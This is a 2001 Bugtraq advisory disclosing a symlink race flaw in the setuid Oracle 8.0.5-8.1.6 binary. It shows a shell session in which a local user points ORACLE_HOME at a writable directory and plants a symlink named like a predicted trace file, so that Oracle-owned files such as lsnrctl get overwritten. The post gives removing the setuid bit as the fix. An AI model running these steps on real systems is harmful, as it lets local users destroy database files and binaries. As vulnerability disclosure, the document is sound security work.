Bugtraq mailing list archives

vulnerability in oracle binary in Oracle 8.0.5 - 8.1.6

From: Juan Manuel Pascual Escriba <pask () plazasite com>
Date: Thu, 02 Aug 2001 09:57:26 +0200




                      WWW.PLAZASITE.COM

                  System & Security Division





   Title:     Vulnerability in oracle binary in Oracle 8.0.5

    Date:     11-12-2000

Platform:     Only tested in Linux, but can be "exported" to others.

  Impact:     Any user compromise any file owned by oracle (DDBB owner).

  Author:     Juan Manuel Pascual (pask () plazasite com)

  Status:     Vendor Contacted at 18th July 2001

PROBLEM SUMMARY:
    There is a write permision checking error in oracle binary  that can
be used by local
users to write any file owned by oracle.

IMPACT:
    Any user with local access, can corrupt the database. Overwrite
oracle binaries, etc.

SOLUTION:
    Chmod -s ;-)))).

STATUS:
    Vendor was contacted .

----------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba            pask () plazasite com

Only for educational purposes. (corrupt a ddbb isnt an educational purpose!)

[pask@proves1 /tmp]$
[pask@proves1 /tmp]$ mkdir rdbms
[pask@proves1 /tmp]$ cd rdbms/
[pask@proves1 rdbms]$ mkdir log
[pask@proves1 rdbms]$ cd log
[pask@proves1 log]$ 
[pask@proves1 log]$ ls -alc
total 8
drwxrwxr-x    2 pask     pask         4096 dic 14 02:33 .
drwxrwxr-x    3 pask     pask         4096 dic 14 02:33 ..
[pask@proves1 log]$ export ORACLE_HOME=/tmp
[pask@proves1 log]$ export REAL_ORACLE_HOME=/usr/local/oracle/app/oracle/product/8.0.5
[pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
[pask@proves1 log]$ ls -alc
total 12
drwxrwxr-x    2 pask     pask         4096 dic 14 02:35 .
drwxrwxr-x    3 pask     pask         4096 dic 14 02:33 ..
-rw-r-----    1 oracle   pask           47 dic 14 02:35 ora_24028.trc

Upsssssssss a log owned by oracle with the structure ora_pid.trc 
I can create:
[pask@proves1 log]$ ln -s $REAL_ORACLE_HOME/bin/lsnrctl ./ora_24050.trc
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
.
..
...
until the log will be my link .. and i overwrite the binary. what about dbf files and go on ....

Current thread:

vulnerability in oracle binary in Oracle 8.0.5 - 8.1.6 Juan Manuel Pascual Escriba (Aug 02)
- RE: vulnerability in oracle binary in Oracle 8.0.5 - 8.1.6 Ron Cohen (Aug 04)
- RE: vulnerability in oracle binary in Oracle 8.0.5 - 8.1.6 Ron Cohen (Aug 05)
  - Re: vulnerability in oracle binary in Oracle 8.0.5 - 8.1.6 Pete Finnigan (Aug 08)